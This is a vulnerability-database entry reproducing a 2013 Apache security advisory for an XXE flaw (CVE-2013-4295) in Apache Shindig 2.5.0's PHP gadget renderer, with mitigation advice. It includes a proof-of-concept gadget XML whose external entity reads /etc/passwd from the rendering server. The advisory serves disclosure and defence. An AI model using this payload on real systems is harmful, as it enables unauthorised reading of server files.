Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Apache Shindig 2.5.0 XXE Injection

🗓️ 22 Oct 2013 00:00:00Reported by Kousuke EbiharaType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 45 Views

Apache Shindig 2.5.0 XXE Injection CVE-2013-429

Related
Code
ReporterTitlePublishedViews
Family
Circl		CVE-2013-4295
21 Oct 201300:00
circl
CVE		CVE-2013-4295
24 Oct 201301:00
cve
Cvelist		CVE-2013-4295
24 Oct 201301:00
cvelist
Github Security Blog		Apache Shindig PHP Sensitive Information Disclosure
17 May 202204:59
github
NVD		CVE-2013-4295
24 Oct 201303:48
nvd
OSV		GHSA-6JVW-RPW4-GJ4X Apache Shindig PHP Sensitive Information Disclosure
17 May 202204:59
osv
Prion		Xxe
24 Oct 201303:48
prion
RedhatCVE		CVE-2013-4295
22 May 202503:33
redhatcve
securityvulns		[CVE-2013-4295] Apache Shindig information disclosure vulnerability
28 Oct 201300:00
securityvulns
securityvulns		Web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)
28 Oct 201300:00
securityvulns
Rows per page
`CVE-2013-4295: XXE vulnerability In Apache Shindig 2.5.0 (PHP)  
  
Severity: Important  
  
Vendor: The Apache Software Foundation  
  
Versions Affected: Apache Shindig PHP 2.5.0  
  
Description: The gadget renderer in the PHP version of Apache Shindig  
is subject to an XML External Entity (XXE) Injection attack. The  
vulnerability allows a malicious gadget author to construct paths to  
content on the gadget rendering server which in turn will display the  
content in the gadget iframe.  
  
Mitigation: 2.5.0 users should upgrade to 2.5.0-update1.  
  
Example: The following gadget XML demonstrates the issue.  
  
<?xml version="1.0" encoding="UTF-8"?>  
<!DOCTYPE Module [ <!ENTITY passwd SYSTEM "file:///etc/passwd"> ]>  
<Module>  
<ModulePrefs title="Test Application">  
<Require feature="opensocial-0.9" />  
</ModulePrefs>  
<Content type="html">  
&passwd; hello  
</Content>  
</Module>  
  
After rendering this gadget you will see the content of /etc/passwd in  
the gadget iframe.  
  
Credit: This issue was discovered by Kousuke Ebihara.  
  
References: http://shindig.apache.org/security.html  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
22 Oct 2013 00:00Current
EPSS0.17005
apache shindigxxe injectioncve-2013-4295severity importantapache software foundationxml external entityvulnerabilitymitigationupgradekousuke ebiharasecurity reference
45